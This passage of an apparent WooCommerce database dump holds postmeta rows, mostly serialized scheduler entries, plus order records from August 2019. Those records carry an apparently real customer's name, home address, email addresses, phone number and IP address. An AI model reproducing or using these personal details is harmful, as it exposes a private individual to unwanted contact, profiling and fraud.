ionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18565,32172,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564801856;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18566,32173,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564805586;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18567,32174,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564805586;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18568,32175,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564809589;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18569,32176,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564809589;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18570,32177,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564813287;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18571,32178,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564813287;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18572,32179,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564820150;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18573,32180,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564820150;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18574,32181,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564824068;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18575,32182,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564824068;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18576,32183,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564835002;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18577,32184,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564835002;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18578,32185,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564839153;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18579,32186,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564839153;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18580,32187,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564842770;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18581,32188,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564842770;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18582,32189,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564846386;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18583,32190,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564846386;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18584,32191,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564851272;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18585,32192,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564851272;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18586,32193,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564857057;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18587,32194,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564857057;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18588,32195,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564872113;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18589,32196,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564872113;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18590,32197,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564876471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18591,32198,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564876471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18592,32199,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564881372;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18593,32200,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564881372;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18594,32201,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564891933;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18595,32202,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564891933;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18596,32203,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564895905;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18597,32204,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564895905;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18598,32205,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564900155;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18599,32206,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564900155;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18600,32207,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564904058;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18601,32208,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564904058;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18602,32209,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564907706;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18603,32210,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564907706;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18604,32211,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564911329;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18605,32212,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564911330;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18606,32213,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564914951;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18607,32214,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564914951;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18608,32215,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564918563;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18609,32216,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564918563;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18610,32217,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564922177;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18611,32218,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564922177;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18612,32219,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564927163;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18613,32220,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564927163;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18614,32221,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564930780;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18615,32222,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564930780;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18616,32223,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564934391;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18617,32224,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564934391;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18618,32225,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564938008;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18619,32226,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564938008;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18620,32227,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564943108;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18621,32228,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564943108;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18622,32229,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564950230;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18623,32230,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564950230;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18624,32231,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564954124;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18625,32232,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564954124;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18626,32233,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564959699;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18627,32234,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564959699;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18628,32235,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564964564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18629,32236,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564964564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18630,32237,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564968178;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18631,32238,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564968178;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18632,32239,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564972971;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18633,32240,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564972972;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18634,32241,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564977040;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18635,32242,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564977040;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18636,32243,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564985569;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18637,32244,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564985569;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18638,32245,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564989609;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18639,32246,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564989610;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18640,32247,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987382;}'),(18641,32249,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987387;}'),(18642,32248,'_order_key','wc_order_i1uBs67NmUIY4'),(18643,32248,'_customer_user','3'),(18644,32248,'_payment_method','payfast'),(18645,32248,'_payment_method_title','PayFast'),(18646,32248,'_customer_ip_address','165.255.71.243'),(18647,32248,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18648,32248,'_created_via','checkout'),(18649,32248,'_cart_hash','b830c3fbcf4e2cccd5244d6db31e0573'),(18650,32248,'_billing_first_name','Nazeer'),(18651,32248,'_billing_last_name','Abrahams'),(18652,32248,'_billing_company','Awesome-Inc'),(18653,32248,'_billing_address_1','9 jade close'),(18654,32248,'_billing_address_2','Ext 11'),(18655,32248,'_billing_city','Ennerdale'),(18656,32248,'_billing_state','GP'),(18657,32248,'_billing_postcode','1825'),(18658,32248,'_billing_country','ZA'),(18659,32248,'_billing_email','nazeer3791@gmail.com'),(18660,32248,'_billing_phone','0609834775'),(18661,32248,'_order_currency','ZAR'),(18662,32248,'_cart_discount','551'),(18663,32248,'_cart_discount_tax','0'),(18664,32248,'_order_shipping','0'),(18665,32248,'_order_shipping_tax','0'),(18666,32248,'_order_tax','0'),(18667,32248,'_order_total','199.00'),(18668,32248,'_order_version','3.6.5'),(18669,32248,'_prices_include_tax','no'),(18670,32248,'_billing_address_index','Nazeer Abrahams Awesome-Inc 9 jade close Ext 11 Ennerdale GP 1825 ZA nazeer3791@gmail.com 0609834775'),(18671,32248,'_shipping_address_index','        '),(18672,32248,'is_vat_exempt','no'),(18673,32250,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987383;}'),(18674,32248,'es_wc_activecampaign_opt_in','no'),(18675,32251,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987403;}'),(18676,32252,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987469;}'),(18677,32253,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987464;}'),(18678,32248,'_download_permissions_granted','yes'),(18679,32248,'_recorded_sales','yes'),(18680,32248,'_recorded_coupon_usage_counts','yes'),(18681,29812,'_used_by','3'),(18682,32248,'_order_stock_reduced','yes'),(18683,32248,'_bewpi_invoice_date','2019-08-05 08:44:24'),(18684,32248,'_bewpi_invoice_number','32248'),(18685,32248,'_bewpi_invoice_pdf_path','/32248-2019.pdf'),(18686,32254,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987560;}'),(18687,32248,'_date_completed','1564987555'),(18688,32248,'_date_paid','1564987555'),(18689,32248,'_paid_date','2019-08-05 08:45:55'),(18690,32248,'_completed_date','2019-08-05 08:45:55'),(18691,32255,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987555;}'),(18692,32256,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987555;}'),(18693,32248,'bewpi_pdf_invoice_sent','1'),(18694,32248,'_edit_lock','1564987740:3'),(18695,32248,'_edit_last','3'),(18696,32257,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987710;}'),(18697,32258,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564987715;}'),(18698,32259,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564993236;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18699,32260,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564993237;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18700,32261,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564992490;}'),(18701,32263,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564992495;}'),(18702,32262,'_order_key','wc_order_JFBYxfuXasghS'),(18703,32262,'_customer_user','3'),(18704,32262,'_payment_method','payfast'),(18705,32262,'_payment_method_title','PayFast'),(18706,32262,'_customer_ip_address','165.255.71.243'),(18707,32262,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18708,32262,'_created_via','checkout'),(18709,32262,'_cart_hash','d021ae684735360d2f78f9766d28cf96'),(18710,32262,'_billing_first_name','Nazeer'),(18711,32262,'_billing_last_name','Abrahams'),(18712,32262,'_billing_email','nazeer@digitalstrategies.co.za'),(18713,32262,'_order_currency','ZAR'),(18714,32262,'_cart_discount','551'),(18715,32262,'_cart_discount_tax','0'),(18716,32262,'_order_shipping','0.00'),(18717,32262,'_order_shipping_tax','0'),(18718,32262,'_order_tax','0'),(18719,32262,'_order_total','274.00'),(18720,32262,'_order_version','3.6.5'),(18721,32262,'_prices_include_tax','no'),(18722,32262,'_billing_address_index','Nazeer Abrahams        nazeer@digitalstrategies.co.za '),(18723,32262,'_shipping_address_index','        '),(18724,32262,'is_vat_exempt','no'),(18725,32264,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564992490;}'),(18726,32262,'_wcf_checkout_id','31362'),(18727,32262,'_wcf_flow_id','31300'),(18728,32262,'_wcf_bump_product','31327'),(18729,32262,'es_wc_activecampaign_opt_in','no'),(18730,32265,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564996912;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18731,32266,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1564996912;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18732,32267,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564994966;}'),(18733,32269,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564994971;}'),(18734,32268,'_order_key','wc_order_cW9kYTPRNbjj6'),(18735,32268,'_customer_user','3'),(18736,32268,'_payment_method','payfast'),(18737,32268,'_payment_method_title','PayFast'),(18738,32268,'_customer_ip_address','165.255.71.243'),(18739,32268,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18740,32268,'_created_via','checkout'),(18741,32268,'_cart_hash','d021ae684735360d2f78f9766d28cf96'),(18742,32268,'_billing_first_name','Nazeer'),(18743,32268,'_billing_last_name','Abrahams'),(18744,32268,'_billing_email','nazeer@digitalstrategies.co.za'),(18745,32268,'_order_currency','ZAR'),(18746,32268,'_cart_discount','551'),(18747,32268,'_cart_discount_tax','0'),(18748,32268,'_order_shipping','0.00'),(18749,32268,'_order_shipping_tax','0'),(18750,32268,'_order_tax','0'),(18751,32268,'_order_total','274.00'),(18752,32268,'_order_version','3.6.5'),(18753,32268,'_prices_include_tax','no'),(18754,32268,'_billing_address_index','Nazeer Abrahams        nazeer@digitalstrategies.co.za '),(18755,32268,'_shipping_address_index','        '),(18756,32268,'is_vat_exempt','no'),(18757,32270,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564994966;}'),(18758,32268,'_wcf_checkout_id','31362'),(18759,32268,'_wcf_flow_id','31300'),(18760,32268,'_wcf_bump_product','31327'),(18761,32268,'es_wc_activecampaign_opt_in','no'),(18762,32271,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565000611;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18763,32272,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565000612;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18764,32273,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564999097;}'),(18765,32275,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564999103;}'),(18766,32274,'_order_key','wc_order_eUVk7EOm002LM'),(18767,32274,'_customer_user','3'),(18768,32274,'_payment_method','payfast'),(18769,32274,'_payment_method_title','PayFast'),(18770,32274,'_customer_ip_address','165.255.71.243'),(18771,32274,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 